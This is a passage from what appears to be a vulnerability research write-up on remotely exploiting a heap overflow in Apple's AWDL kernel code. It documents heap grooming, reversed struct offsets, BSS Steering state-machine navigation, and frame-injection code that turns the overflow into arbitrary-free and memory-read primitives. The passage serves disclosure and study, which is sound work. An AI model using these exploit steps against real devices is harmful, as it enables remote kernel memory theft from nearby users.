    this->bloom_filter_macs[n_peers_in_filter] = peer->mac;

    peer = peer->flink;

  }

 

  bloom_filter_create(10*(n_peers_in_filter+7) & 0xff8,

                      0,

                      n_peers_in_filter,

                      this->bloom_filter_macs,

                      this->bloom_filter_buf);

 

  if (n_peers_in_filter){

    this->updateBroadcastMI(9, 1, 0);
  }

 

  return 0;

}


From the IO80211AWDLPeerManager it's reading the peer list head pointer as well as a count of the number of entries in the peer list. For each entry in the list it's reading the MAC address field into an array then builds a bloom filter from that buffer. 


The interesting part here is that the list traversal is terminated using a count of elements which have been traversed rather than by looking for a termination pointer value at the end of the list (eg a NULL or a pointer back to the head element.) This means that potentially if we could corrupt the linked-list pointer of the second-to-last peer to be processed we could point it to a fake peer and get data at a controlled address added into the bloom filter. updateBroadcastMI looks like it will add that bloom filter data to the Master Indication frame in the bloom filter TLV, meaning we could get a bloom filter containing data read from a controlled address sent back to us. Depending on the exact format of the bloom filter it would probably be possible to then recover at least some bits of remote memory.


It's important to emphasize at this point that due to the lack of a remote KASLR leak and also the lack of a remote PAC signing gadget or vtable disclosure, in order to corrupt the linked-list pointer of an adjacent peer object we have no option but to corrupt its vtable pointer with an invalid value. This means that if any virtual methods were called on this object, it would almost certainly cause a kernel panic.


The first part of trying to get this to work was to work out how to build a suitable heap groom such that we could overflow from a peer into the second-to-last peer in the list which would be processed.


Both the linked-list order and the virtual memory order need to be groomed to allow a targeted partial overflow of the final linked-list pointer to be traversed. In this layout we'd need to overflow from 2 into 6 to corrupt the final pointer from 6 to 7.


There is a mitigation from a few years ago in play here which we'll have to work around; namely the randomization of the initial zone freelists which adds a slight element of randomness to the order of the allocations you will get for consecutive calls to kalloc for the same size. The randomness is quite minimal however so the trick here is to be able to pad your allocations with "safe" objects such that even though you can't guarantee that you always overflow into the target object, you can mostly guarantee that you'll overflow into that object or a safe object.


We need two things: firstly, an understanding of the semantics of the list; and secondly, some safe objects to groom with.

The peer list

With a bit of reversing we can determine that the code which adds peers to the list doesn't simply add them to the start. Peers which are first seen on a 2.4GHz channel (6) do get added this way, but peers first seen on a 5GHz channel (44) are inserted based on their RSSI (received signal strength indication - a unitless value approximating signal strength.) Stronger signals mean the peer is probably physically closer to the device and will also be closer to the start of the list. This gives some nice primitives for manipulating the list and ensuring we know where peers will end up.

Safe objects

The second requirement is to be able to allocate arbitrary, safe objects. Our ideal heap grooming/shaping objects would have the following primitives:


1) arbitrary size

2) unlimited allocation quantity

3) allocation has no side effects

4) controlled contents

5) contents can be safely corrupted

6) can be free'd at an arbitrary, controlled point, with no side effects


Of course, we're completely limited to objects we can force to be allocated remotely via AWDL so all the tricks from local kernel exploitation don't work. For example, I and others have used various forms of mach messages, unix pipe buffers, OSDictionaries, IOSurfaces and more to build these primitives. None of these are going to work at all. AWDL is sufficiently complicated however that after some reversing I found a pretty good candidate object.

Service response descriptor (SRD)

This is my reverse-engineered definition of the service response descriptor TLV (type 2):


{ u8  type

  u16 len

  u16 key_len

  u8  key_val[key_len]

  u16 value_total_size

  u16 fragment_offset

  u8  fragment[len-key_len-6] }


It has two variable-sized fields: key_val and fragment. The key_len field defines the length of the key_val buffer, and the length of fragment is the remaining space left at the end of the TLV. The parser for this TLV makes a kalloc allocation of value_total_size, an arbitrary u16. It then memcpy's from fragment into that kalloc buffer at offset fragment_offset:


The service_response technique gives us a powerful heap grooming primitive


I believe this is supposed to be support for receiving out-of-order fragments of service request responses. It gives us a very powerful primitive for heap grooming. We can choose an arbitrary allocation size up to 64k and write an arbitrary amount of controlled data to an arbitrary offset in that allocation and we only need to provide the offset and content bytes.
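

Putting that together, the reversed parse logic looks roughly like this (my reconstruction, in the style of the earlier decompilations; read_le16 is an assumed helper and the bounds checks are elided):


// Sketch of the SRD (type 2) parse path: an arbitrary-sized kalloc
// allocation with attacker-controlled bytes written at an
// attacker-controlled offset.
void parse_srd(struct awdl_tlv *tlv) {
  uint16_t key_len = read_le16(&tlv->val[0]);
  uint16_t value_total_size = read_le16(&tlv->val[2 + key_len]);
  uint16_t fragment_offset = read_le16(&tlv->val[4 + key_len]);
  size_t fragment_len = tlv->len - key_len - 6;

  void *buf = kalloc(value_total_size);      // attacker-chosen size
  memcpy((uint8_t*)buf + fragment_offset,    // attacker-chosen offset
         &tlv->val[6 + key_len],
         fragment_len);                      // attacker-controlled bytes
}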


This also gives us a kind of amplification primitive. We can bundle quite a lot of these TLVs in one frame allowing us to make megabytes of controlled heap allocations with minimal side effects in just one AWDL frame.


This SRD technique in fact almost completely meets criteria 1-5 outlined above. It's almost perfect apart from one crucial point; how can we free these allocations?


Through static reversing I couldn't find how these allocations would be free'd, so I wrote a dtrace script to help me find when those exact kalloc allocations were free'd. Running this dtrace script then running a test AWDL client sending SRDs I saw the allocation but never the free. Even disabling the AWDL interface, which should clean up most of the outstanding AWDL state, doesn't cause the allocation to be freed.


This is possibly a bug in my dtrace script, but there's another theory: I wrote another test client which allocated a huge number of SRDs. This allocated a substantial amount of memory, enough to be visible using zprint. And indeed, running that test client repeatedly then running zprint you can observe the inuse count of the target zone getting larger and larger. Disabling AWDL doesn't help, neither does waiting overnight. This looks like a pretty trivial memory leak.


Later on we'll examine the cause of this memory leak but for now we have a heap allocation primitive which meets criteria 1-5, that's probably good enough!

A first attempt at a useful corruption

I managed to build a heap groom which gets the linked-list and heap objects set up such that I can overflow into the second-to-last peer object to be processed:


By surrounding peer objects with a sufficient number of safe objects we can ensure that the linear corruption either hits the right peer object or a safe object


The trick is to ensure that the ratio of safe objects to peers is sufficiently high that you can be (reasonably) sure that the two target peers will only be next to each other or next to safe objects (they won't be next to other peers in the list.) Even though you may not be able to force the two peers to be in the correct order as shown in the diagram, you can at least make the corruption safe if they aren't, then try again.


When writing the code to build the SyncTree TLV I realized I'd made a huge oversight...


My initial idea had been to only partially overwrite a valid linked-list pointer element:


If we could partially overflow the peer_list_flink pointer we could potentially move it to point it somewhere nearby. In this illustration by moving it down by 8 bytes we could potentially get some bytes of a peer_list_blink added to the peer MACs bloom filter. A partial overwrite doesn't directly give a relative add or subtract primitive, but with some heap grooming overwriting the lower 2 bytes can yield something similar


But when you actually look more closely at the memory layout taking into account the limitations of the corruption primitive:


Computing the relative offsets between two IO80211AWDLPeers next to each other in memory it turns out that a useful partial overwrite of peer_list_flink isn't possible as it lies on a 6-byte boundary from the lower peer's sync_tree_macs array


This is not a useful type of partial overwrite, and it took a lot of effort to make this heap groom work only to realize this obvious oversight in hindsight.


Attempting to salvage something from all this work I tried instead to just completely overwrite the linked-list pointer. We'd still need some other vulnerability or technique to determine what we should overwrite with but it would at least be some progress to see a read or write from a controlled address.


Alas, whilst I'm able to do the overflow, it appears that the linked-list of peers is continually traversed in the background, even when there's no AWDL traffic, and virtual methods are called on each peer. This will make things significantly harder without first knowing a vtable pointer.


Another option would be to trigger the SyncTree overflow twice during the parsing of a single frame. Recall the code in actionFrameReport:


IO80211AWDLPeer::actionFrameReport

...

      case 0x14:

        if (tlv_cnt[0x14] >= 2)

          goto ERR;

        tlv_cnt[0x14]++;

        this->parseAwdlSyncTreeTLV(bytes);


I explored places where a TLV would trigger a peer list traversal. The idea would then be to sandwich a controlled lookup between two SyncTree TLVs, the first to corrupt the list and the second to somehow make that safe. There were some code paths like this, where we could cause a controlled peer to be looked up in the peer list. There were even some places where we could potentially get a different memory corruption primitive from this but they looked even trickier to exploit. And even then you'd not be able to reset the peer list pointer with the second overflow anyway.

Reset

Thus far none of my ideas for a read panned out; messing with the linked list without a correctly PAC'd vtable pointer just doesn't seem feasible. At this point I'd probably consider looking for a second vulnerability. For example, in Natalie's recent WebRTC exploit she was able to find a second vulnerability to defeat ASLR.


There are still some other ideas left open but they seem tricky to get right:


The other major type of object in the kalloc.6144 zone are ipc_kmsg's for some IOKit methods. These are in-flight mach messages and it might be possible to corrupt them such that we could inject arbitrary mach messages into userspace. This idea seems mostly to create new challenges rather than solve any open ones though.


If we don't target the same zone then we could try a cross-zone attack, but even then we're quite limited by the primitives offered by AWDL. There just aren't that many interesting objects we can allocate and manipulate.


By this point I've invested a lot of time into this project and am not willing to give up. I've also been hearing very faint whispers that I might have accidentally stumbled upon an attack surface which is being actively exploited. Time to try one more thing...

Getting up to date

Up until this point I'd been doing most of my reversing using the partially symbolized iOS 12 beta 1 kernelcache. I had done a considerable amount of reverse engineering to build up a reasonable idea of all the fields in the IO80211AWDLPeer object which I could corrupt and it wasn't looking promising. But this vulnerability was only going to get patched in iOS 13.3.1.


Could they have added new fields in iOS 13? It seemed unlikely but of course worth a look.


Here's my reverse-engineered structure definition for IO80211AWDLPeer in iOS 13.3/MacOS 10.15.2:


struct __attribute__((packed)) __attribute__((aligned(4))) IO80211AWDLPeer {

/* +0x0000 */  void *vtable;

/* +0x0008 */  uint32_t ref_cnt;

/* +0x000C */  uint32_t bucket;

/* +0x0010 */  void *peer_list_flink;

/* +0x0018 */  void *peer_list_blink;

/* +0x0020 */  struct ether_addr peer_mac;

/* +0x0026 */  uint8_t pad1[2];

/* +0x0028 */  struct IO80211AWDLPeerManager *peer_manager;

/* +0x0030 */  uint8_t pad8[384];

/* +0x01B0 */  uint16_t HT_FLAGS;

/* +0x01B2 */  uint8_t HT_features[26];

/* +0x01CC */  uint8_t HT_caps;

/* +0x01CD */  uint8_t pad10[14];

/* +0x01DB */  uint8_t VHT_caps;

/* +0x01DC */  uint8_t pad9[732];

/* +0x04B8 */  uint8_t added_to_fw_cache;

/* +0x04B9 */  uint8_t is_on_correct_infra_channel;

/* +0x04BA */  uint8_t pad0[6];

/* +0x04C0 */  uint32_t nsync_total_len;

/* +0x04C4 */  uint8_t nsync_tlv_buf[64];

/* +0x0504 */  uint32_t flags_from_dp_tlv;

/* +0x0508 */  uint8_t pad14[19];

/* +0x051B */  uint32_t n_sync_tree_macs;

/* +0x051F */  uint8_t pad20[126];

/* +0x059D */  uint8_t peer_infra_channel;

/* +0x059E */  struct ether_addr peer_infra_mac;

/* +0x05A4 */  struct ether_addr some_other_mac;

/* +0x05AA */  uint8_t country_code[3];

/* +0x05AD */  uint8_t pad5[41];

/* +0x05D6 */  uint16_t social_channels;

/* +0x05D8 */  uint64_t last_AF_timestamp;

/* +0x05E0 */  uint8_t pad17[116];

/* +0x0654 */  uint8_t chanseq_encoding;

/* +0x0655 */  uint8_t chanseq_count;

/* +0x0656 */  uint8_t chanseq_step_count;

/* +0x0657 */  uint8_t chanseq_dup_count;

/* +0x0658 */  uint8_t pad19[4];

/* +0x065C */  uint16_t chanseq_fill_channel;

/* +0x065E */  uint8_t chanseq_channels[32];

/* +0x067E */  uint8_t pad2[64];

/* +0x06BE */  uint8_t raw_chanseq[64];

/* +0x06FE */  uint8_t pad18[194];

/* +0x07C0 */  uint64_t last_UMI_update_timestamp;

/* +0x07C8 */  struct IO80211AWDLPeer *UMI_chain_flink;

/* +0x07D0 */  uint8_t pad16[8];

/* +0x07D8 */  uint8_t is_in_umichain;

/* +0x07D9 */  uint8_t pad15[79];

/* +0x0828 */  uint8_t datapath_tlv_flags_bit_5_dualband;

/* +0x0829 */  uint8_t pad12[2];

/* +0x082B */  uint8_t SDB_mode;

/* +0x082C */  uint8_t pad6[28];

/* +0x0848 */  uint8_t did_parse_datapath_tlv;

/* +0x0849 */  uint8_t pad7[1011];

/* +0x0C3C */  uint32_t UMI_feature_mask;

/* +0x0C40 */  uint8_t pad22[2568];

/* +0x1648 */  struct ether_addr sync_tree_macs[10]; // overflowable

/* +0x1684 */  uint8_t sync_error_count;

/* +0x1685 */  uint8_t had_chanseq_tlv;

/* +0x1686 */  uint8_t pad3[2];

/* +0x1688 */  uint64_t per_second_timestamp;

/* +0x1690 */  uint32_t n_frames_in_last_second;

/* +0x1694 */  uint8_t pad21[4];

/* +0x1698 */  void *steering_msg_blob;  // NEW FIELD

/* +0x16A0 */  uint32_t steering_msg_blob_size;  // NEW FIELD

}

The layout of fields in my reverse-engineered version of IO80211AWDLPeer. You can define and edit structures in C-syntax like this using the Local Types window in IDA: right-clicking a type and selecting "Edit..." brings up an interactive edit window; it's very helpful for reversing complex data structures such as this.


There are new fields! In fact, there's a new pointer field and length field right at the end of the IO80211AWDLPeer object. But what is a steering_msg_blob? What is BSS Steering?

BSS Steering

Let's take a look at where the steering_msg_blob pointer is used.


It's allocated in IO80211AWDLPeer::populateBssSteeringMsgBlob, via the following call stack:


IO80211PeerBssSteeringManager::processPostSyncEvaluation

IO80211PeerBssSteeringManager::bssSteeringStateMachine


bssSteeringStateMachine is called from many places, including IO80211AWDLPeer::actionFrameReport when it parses a BSS Steering TLV (type 0x1d), so it looks like we can indeed drive this state machine remotely somehow.


The steering_msg_blob pointer is freed in IO80211AWDLPeer::freeResources when the IO80211AWDLPeer object is destroyed:


  steering_msg_blob = this->steering_msg_blob;

  if ( steering_msg_blob )

  {

    kfree(steering_msg_blob, this->steering_msg_blob_size);


This gives us our first new primitive: an arbitrary free. Without needing to reverse any of the BSS Steering code we can quite easily overflow from the sync_tree_macs field into the steering_msg_blob and steering_msg_blob_size fields, setting them to arbitrary values.


If we then wait for the peer to timeout and be destroyed, when ::freeResources is called it will call kfree with our arbitrary pointer and size.
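To make this concrete, here's a minimal sketch of the overflow payload using the struct offsets above (target_addr and target_size are illustrative names for whatever we want freed):

char payload[0x60] = {0};
// sync_tree_macs is at +0x1648; +0x50 into it reaches steering_msg_blob
// (+0x1698) and +0x58 reaches steering_msg_blob_size (+0x16A0)
*(uint64_t *)&payload[0x50] = target_addr;
*(uint32_t *)&payload[0x58] = target_size;
// send payload as a SYNC_TREE TLV, then let the peer time out:
// ::freeResources will call kfree(target_addr, target_size)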


The steering_msg_blob is also used in one more place:


In IO80211AWDLPeerManager::handleUmiTimer the IO80211AWDLPeerManager walks a linked-list of peers (a separate linked-list from that used to store all the peers) and from each of the peers in that list it checks whether that peer and the current device are on the same channel and in an availability window:


if ( peer_manager->current_channel_ == peer->chanseq_channels[peer_manager->current_chanseq_step] ) {

...


If the UMI timer has indeed fired when both this device and the peer from the UMI list are on the same channel in an overlapping availability window, then the IO80211AWDLPeerManager removes the peer from the UMI list, reads the bss_steering_blob from the peer and passes it as the last argument to the peer manager's ::sendUnicastMI method.


This passes that blob to IO80211AWDLPeerManager::buildMasterIndicationTemplate to build an AWDL master indication frame before attempting to transmit it.


Let's look at how buildMasterIndicationTemplate uses the steering_msg_blob:


The third argument to buildMasterIndicationTemplate is is_unicast_MI which indicates whether this method was called by IO80211AWDLPeerManager::sendUnicastMI (which sets it to 1) or IO80211AWDLPeerManager::updatePrimaryPayloadMI (which sets it to 0.)


If buildMasterIndicationTemplate was called to build a unicast MI frame and the peer's feature_mask field has the 0xD'th bit set then the steering_msg_blob will be passed to IO80211AWDLPeerManager::buildMultiPeerBssSteeringTlv. This method reads a size from the second dword in the steering_msg_blob and checks whether it is smaller than the remaining space in the frame template buffer; if it is, then that size value is used to copy that number of bytes from the steering_msg_blob pointer into a TLV (type 0x1d) in the template frame which will then be sent out over the air!


There's clearly a path here to get a semi-arbitrary read; but actually triggering it will require quite a bit more reversing. We need the UMI timer to be firing and we also need to get a peer into the UMI linked list.

BSS steering state machine

At this point a sensible question to ask is, what exactly is BSS Steering? A bit of googling tells us that it's part of 802.11v, a set of management standards for enterprise networks. One of the advanced features of enterprise networks is the ability to seamlessly move devices between different access points which form part of the same network, for example when you walk around the office with your phone or if there are too many devices associated with one access point. AWDL isn't part of 802.11v. My best guess as to what's happening here is that AWDL is driving the 802.11v AP roaming code to try to move AWDL clients on to a common infrastructure network. I think this code was added to support Sidecar, but everything below is based only on static reversing.


IO80211PeerBssSteeringManager::bssSteeringStateMachine is responsible for driving the BSS steering state machine. The first argument is a bssSteeringEvent enum value representing an event which the state machine should process. Using the IO80211PeerBssSteeringManager::getEventName method we can determine the names for all the events which the state machine will process and using the IO80211PeerBssSteeringManager::getStateName method we can determine the names of the states which the state machine can be in. Again using the local types window in IDA we can define enums for these which will make the HexRays decompiler output much more readable:


enum BSSSteeringState

{

  BSS_STEERING_STATE_IDLE = 0x0,

  BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL = 0x1,

  BSS_STEERING_STATE_ASSOCIATION_ONGOING = 0x2,

  BSS_STEERING_STATE_TX_CONFIRM_AWAIT = 0x3,

  BSS_STEERING_STATE_STEERING_SYNC_CONFIRM_AWAIT = 0x4,

  BSS_STEERING_STATE_STEERING_SYNCED = 0x5,

  BSS_STEERING_STATE_STEERING_SYNC_FAILED = 0x6,

  BSS_STEERING_STATE_SELF_STEERING_ASSOCIATION_ONGOING = 0x7,

  BSS_STEERING_STATE_STEERING_SYNC_POST_EVAL = 0x8,

  BSS_STEERING_STATE_SUSPEND = 0x9,

  BSS_STEERING_INVALID = 0xA,

};


enum bssSteeringEvent

{

 BSS_STEERING_MODE_ENABLE = 0x0,

 BSS_STEERING_RECEIVED_DIRECTED_STEERING_CMD = 0x1,

 BSS_STEERING_DO_PRESYNC_EVAL = 0x2,

 BSS_STEERING_PRESYNC_EVAL_DONE = 0x3,

 BSS_STEERING_SELF_INFRA_LINK_CHANGED = 0x4,

 BSS_STEERING_DIRECTED_STEERING_CMD_SENT = 0x5,

 BSS_STEERING_DIRECTED_STEERING_TX_CONFIRM_RXED = 0x6,

 BSS_STEERING_SYNC_CONFIRM_ATTEMPT = 0x7,

 BSS_STEERING_SYNC_SUCCESS_EVENT = 0x8,

 BSS_STEERING_SYNC_FAILED_EVENT = 0x9,

 BSS_STEERING_OVERALL_STEERING_TIMEOUT = 0xA,

 BSS_STEERING_DISABLE_EVENT = 0xB,

 BSS_STEERING_INFRA_LINK_CHANGE_TIMEOUT = 0xC,

 BSS_STEERING_SELF_STEERING_REQUESTED = 0xD,

 BSS_STEERING_SELF_STEERING_DONE = 0xE,

 BSS_STEERING_SUSPEND_EVENT = 0xF,

 BSS_STEERING_RESUME_EVENT = 0x10,

 BSS_STEERING_REMOTE_STEERING_TRIGGER = 0x11,

 BSS_STEERING_PEER_INFRA_LINK_CHANGED = 0x12,

 BSS_STEERING_REMOTE_STEERING_FAILED_EVENT = 0x13,

 BSS_STEERING_INVALID_EVENT = 0x14,

};


The current state is maintained in a steering context object, owned by the IO80211PeerBssSteeringManager. Reverse engineering the state machine code we can come up with the following rough definition for the steering context object:


struct __attribute__((packed)) BssSteeringCntx

{

  uint32_t first_field;

  uint32_t service_type;

  uint32_t peer_count;

  uint32_t role;

  struct ether_addr peer_macs[8];

  struct ether_addr infraBSSID;

  uint8_t pad4[6];

  uint32_t infra_channel_from_datapath_tlv;

  uint8_t pad8[8];

  char ssid[32];

  uint8_t pad1[12];

  uint32_t num_peers_added_to_umi;

  uint8_t pad_10;

  uint8_t pendingTransitionToNewState;

  uint8_t pad7[2];

  enum BSSSteeringState current_state;

  uint8_t pad5[8];

  struct IOTimerEventSource *bssSteeringExpiryTimer;

  struct IOTimerEventSource *bssSteeringStageExpiryTimer;

  uint8_t pad9[8];

  uint32_t steering_policy;

  uint8_t inProgress;

};


Our goal here is to reach IO80211AWDLPeer::populateBssSteeringMsgBlob, which is called by IO80211PeerBssSteeringManager::processPostSyncEvaluation, which is called when the state machine is in the BSS_STEERING_STATE_STEERING_SYNC_POST_EVAL state and receives the BSS_STEERING_PRESYNC_EVAL_DONE event.

Navigating the state machine

Each time a state is evaluated it can change the current state and optionally set the stateMachineTriggeredEvent variable to a new event and set sendEventToNewState to 1. This way the state machine can drive itself forwards to a new state. Let's try to find the path to our target state:


The state machine begins in BSS_STEERING_STATE_IDLE. When we send the BSS steering TLV for the first time this injects either the BSS_STEERING_REMOTE_STEERING_TRIGGER or BSS_STEERING_RECEIVED_DIRECTED_STEERING_CMD event depending on whether the steeringMsgID in the TLV was 6 or 0.


This causes a call to IO80211PeerBssSteeringManager::processBssSteeringEnabled which parses a steering_msg structure which itself was parsed from the bss steering tlv; we'll take a look at both of those in a moment. If the steering manager is happy with the contents of the steering_msg structure from the TLV it starts two IOTimerEventSources: the bssSteeringExpiryTimer and the bssSteeringStageExpiryTimer. The SteeringExpiry timer will abort the entire steering process when it triggers, which happens after a few seconds. The StageExpiry timer allows the state machine to make progress asynchronously. When it expires it will call the IO80211PeerBssSteeringManager::bssSteeringStageExpiryTimerHandler function, a snippet of which is shown here:


  cntx = this->steering_cntx;

  if ( cntx && cntx->pendingTransitionToNewState )

  {

    current_state = cntx->current_state;

    switch ( current_state )

    {

      case BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL:

        event = BSS_STEERING_DO_PRESYNC_EVAL;

        break;

      case BSS_STEERING_STATE_ASSOCIATION_ONGOING:

      case BSS_STEERING_STATE_SELF_STEERING_ASSOCIATION_ONGOING:

        event = BSS_STEERING_INFRA_LINK_CHANGE_TIMEOUT;

        break;

      case BSS_STEERING_STATE_STEERING_SYNC_CONFIRM_AWAIT:

        event = BSS_STEERING_SYNC_CONFIRM_ATTEMPT;

        break;

      default:

        goto ERR;

    }

    result = this->bssSteeringStateMachine(this, event, ...


We can see here the four state transitions which may happen asynchronously in the background when the StageExpiry timer fires and causes events to be injected.


From BSS_STEERING_STATE_IDLE, after the timers are initialized the code sets the pendingTransitionToNewState flag and updates the state to BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL:


  this->steering_cntx->pendingTransitionToNewState = 1;

  state = BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL;


We can now see that this will cause the BSS_STEERING_DO_PRESYNC_EVAL event to be injected into the steering state machine and we reach the following code:


  case BSS_STEERING_STATE_PRE_STEERING_SYNC_EVAL:

   {

     if ( EVENT == BSS_STEERING_DO_PRESYNC_EVAL ) {

       steering_policy = this->processPreSyncEvaluation(cntx);

       ...


Here the BSS steering TLV gets parsed and reformatted into a format suitable for the BSS steering code, presumably this is the compatibility layer between the 802.11v enterprise WiFi BSS steering code and AWDL.


We need IO80211PeerBssSteeringManager::processPreSyncEvaluation to return a steering_policy value of 7. The code which determines this is very complicated; in the end it turns out that if the target device is currently connected to a 5GHz network on a non-DFS channel then we can get it to return the right steering policy value to reach BSS_STEERING_STATE_STEERING_SYNC_POST_EVAL. DFS channels are dynamic and can be disabled at runtime if radar is detected. There's no requirement that the attacker is also on the same 5GHz network. There might also be another path to reach the required state but this will do.


At this point we finally reach processPostSyncEvaluation and the steering_msg_blob will be allocated and the UMI timer armed. When it starts firing the code will attempt to read the steering_msg_blob pointer and send the buffer it points to over the air.

Building the read

Let's look concretely at what's required for the read:


We need two spoofed peers:


struct ether_addr reader_peer = *(ether_aton("22:22:aa:22:00:00"));

struct ether_addr steerer_peer = *(ether_aton("22:22:bb:22:00:00"));


The target device needs to be aware of both these peers so we allocate the reader peer by spoofing a frame from it:


inject(RT(),

       WIFI(dst, reader_peer),

       AWDL(),

       SYNC_PARAMS(),

       CHAN_SEQ_EMPTY(),

       HT_CAPS(),

       UNICAST_DATAPATH(0x1307 | 0x800),

       PKT_END());


There are two important things here:


1) This peer will have a channel sequence which is empty; this is crucial as it means we can enforce a gap between the allocation of the steering_msg_blob by processPostSyncEvaluation and its use in the UMI timer. Recall that we saw earlier that the unicast MI template only gets built when the UMI timer fires during a peer availability window; if the peer has no availability windows, then the template won't be updated and the steering_msg_blob won't be used. We can easily change the channel sequence later by sending a different TLV.


2) The flags in the UNICAST_DATAPATH TLV. That 0x800 is quite important, without it this happens:


This tweet from @mdowd on May 27th 2020 mentioned a double free in BSS reachable via AWDL


We'll get to that...


The next step is to allocate the steerer_peer and start steering the reader:


inject(RT(),

      WIFI(dst, steerer_peer),

      AWDL(),

      SYNC_PARAMS(),

      HT_CAPS(),

      UNICAST_DATAPATH(0x1307),

      BSS_STEERING(&reader_peer, 1),

      PKT_END());


Let's look at the bss_steering TLV:


struct bss_steering_tlv {

  uint8_t type;

  uint16_t length;

  uint32_t steeringMsgID;

  uint32_t steeringMsgLen;

  uint32_t peer_count;

  struct ether_addr peer_macs[8];

  struct ether_addr BSSID;

  uint32_t steeringTimeoutThreshold;

  uint32_t SSID_len;

  uint8_t infra_channel;

  uint32_t steeringCmdFlags;

  char SSID[32];

} __attribute__((packed));


We need to carefully choose these values; the important part for the exploit however is that we can specify up to 8 peers to be steered at the same time. For this example we'll just steer one peer. Here we build a bss_steering_tlv with only one peer_mac, set to the MAC address of reader_peer. If we've set everything up correctly this should cause the IO80211AWDLPeer object for reader_peer to allocate a steering_msg_blob and start the UMI timer firing, trying to send that blob in a UMI.


UMI?

UMIs are Unicast Master Indication frames; unlike regular AWDL Master Indication frames UMIs are sent to unicast MAC addresses.


We can now send a final frame:


char overflower[0x80] = {0};

*(uint64_t*)(&overflower[0x50]) = 0x4141414141414141;

 

inject(RT(),

       WIFI(dst, reader_peer),

       AWDL(),

       SYNC_PARAMS(),

       SERV_PARAM(),

       HT_CAPS(),

       DATAPATH(reader_peer),

       SYNC_TREE((struct ether_addr*)overflower,

                  sizeof(overflower)/sizeof(struct ether_addr)),

       PKT_END());


There are two important parts to this frame:


1) We've included a SyncTree TLV which will trigger the buffer overflow. SYNC_TREE will copy the MAC addresses in overflower into the sync_tree_macs inline buffer in the IO80211AWDLPeer:


/* +0x1648 */  struct ether_addr sync_tree_macs[10];

/* +0x1684 */  uint8_t sync_error_count;

/* +0x1685 */  uint8_t had_chanseq_tlv;

/* +0x1686 */  uint8_t pad3[2];

/* +0x1688 */  uint64_t per_second_timestamp;

/* +0x1690 */  uint32_t n_frames_in_last_second;

/* +0x1694 */  uint8_t pad21[4];

/* +0x1698 */  void *steering_msg_blob;

/* +0x16A0 */  uint32_t steering_msg_blob_size;


sync_tree_macs is at offset +0x1648 in the IO80211AWDLPeer object and the steering_msg_blob is at +0x1698, so by placing our arbitrary read target 0x50 bytes into the SYNC_TREE TLV we'll overwrite the steering_msg_blob, in this case with the value 0x4141414141414141.


2) The other important part is that we no longer send the CHAN_SEQ_EMPTY TLV, meaning this peer will use the channel sequence in the sync_params TLV. This contains a channel sequence where the peer declares they are listening in every Availability Window (AW), meaning that the next time the UMI timer fires while the target device is also in an AW it will read the corrupted steering_msg_blob pointer and try to build a UMI using it. If we sniff for UMI frames coming from the target MAC address (dst in this example) and parse out TLV 0x1d we'll find our (almost) arbitrarily read memory!


In this case of course trying to read from an address like 0x4141414141414141 will almost certainly cause a kernel panic, so we've still got more work to do.

Almost-arbitrary read

There are some important limitations for this read technique: firstly, the steering_msg_blob has its length as the second dword member and that length will be used as the length of memory to copy into the UMI. This means that we can only read from places where the second dword pointed to is a small value, less than around 800 (the available space in the UMI frame). That size also dictates how much will be read. We can work with this as an initial arbitrary read primitive however.
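In pseudocode the constraint looks something like this (a paraphrase of the reversed buildMultiPeerBssSteeringTlv logic, not the exact decompiler output):

uint32_t len = *(uint32_t *)(steering_msg_blob + 4); // second dword at the target
if (len < remaining_space_in_template) {             // around 800 bytes available
  memcpy(tlv_payload, steering_msg_blob, len);       // ends up on the air
}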


The second limitation is the speed of these reads; in order to steer multiple peers at the same time and therefore perform multiple reads in parallel we'll need some more tricks. For now, the only option is to wait for steering to fail and restart the steering process. This takes around 8 seconds, after which the steering process can be restarted by using a steeringMsgID value of 6 rather than 0 in the BSS_STEERING TLV.

What to read

At this point we can get memory sent back to us provided it meets some requirements. Helpfully, if the memory doesn't meet those requirements the code won't crash as long as the virtual address was mapped and readable, so we have some leeway.


My first idea here was to use the physmap, an (almost) 1:1 virtual mapping of the physical address space in virtual memory. The base address of the physmap is randomized on iOS but the slide is smaller than the physical address space size, meaning there's a virtual address in there you can always read from. This gives you a safe virtual address to dereference to start trying to find pointers to follow.


It was around this point in the development of the exploit that Apple released iOS 13.3.1 which patched the heap overflow. I wanted to also release at least some kind of demo at this point so I released a very basic proof-of-concept which drove the BSS Steering state machine far enough to read from the physmap along with a little javascript snippet you could run in Safari to spray physical memory to demonstrate that you really were reading user data. Of course, this isn't all that compelling; the more compelling demo is still a few months down the road.


Discussing these problems with fellow Project Zero researchers Brandon Azad and Jann Horn, Brandon mentioned that on iOS the base of the zone map, used for most general kernel heap allocations, wasn't very randomized at all. I had looked at this using DTrace on MacOS and it seemed fairly randomized, but dumping kernel layout information on iOS isn't quite as trivial as setting a boot argument to disable SIP and enable kernel DTrace.


Brandon had recently finished the exploit for his oob_timestamp bug and as part of that he'd made a spreadsheet showing various values such as the base of the zone and kalloc maps across multiple reboots. And indeed, the randomization of the base of the zone map is very minimal, around 16 MB:


kASLR       sane_size   zone_min           zone_max

04da4000    72fac000    ffffffe000370000   ffffffe02b554000
080a4000    73cac000    ffffffe0007bc000   ffffffe02be80000
08b28000    73228000    ffffffe00011c000   ffffffe02b3ec000
0bbb0000    721a4000    ffffffe0005bc000   ffffffe02b25c000
0c514000    7383c000    ffffffe000650000   ffffffe02bb68000
0d4d4000    72880000    ffffffe0002d8000   ffffffe02b208000
107d4000    7357c000    ffffffe00057c000   ffffffe02b98c000
12c08000    73148000    ffffffe000598000   ffffffe02b814000
13fb8000    71d98000    ffffffe000714000   ffffffe02b230000
184fc000    73854000    ffffffe00061c000   ffffffe02bb3c000


Using the Service Response Descriptor TLV technique we can allocate 16MB of memory in just a handful of frames, which means we should stand a reasonable chance of being able to safely find our allocations on the heap.

Finding ourselves

What would we like to read? We've discussed before that in order to safely corrupt the fields after the vtable in the IO80211AWDLPeer object we'll need to know a PAC'ed vtable pointer so we'd like to read one of those. If we're able to find one of those we'll also know the address of at least one IO80211AWDLPeer object.


If you make enough allocations of a particular size in iOS they will tend to go from lower addresses to higher addresses. Apple has introduced various small randomizations into exactly how objects are allocated but they're not relevant if we just examine the overall trend, which is to try to fill the virtual memory area reserved for the zone map from bottom to top.


As the maximum slide value of the zone map is smaller than its size, there will be a virtual address which is always inside the zone map.


The insufficient randomization of the zone map base gives us quite a large virtual memory region I've dubbed the safe probe region where, provided we go approximately from low to high, we can safely read.
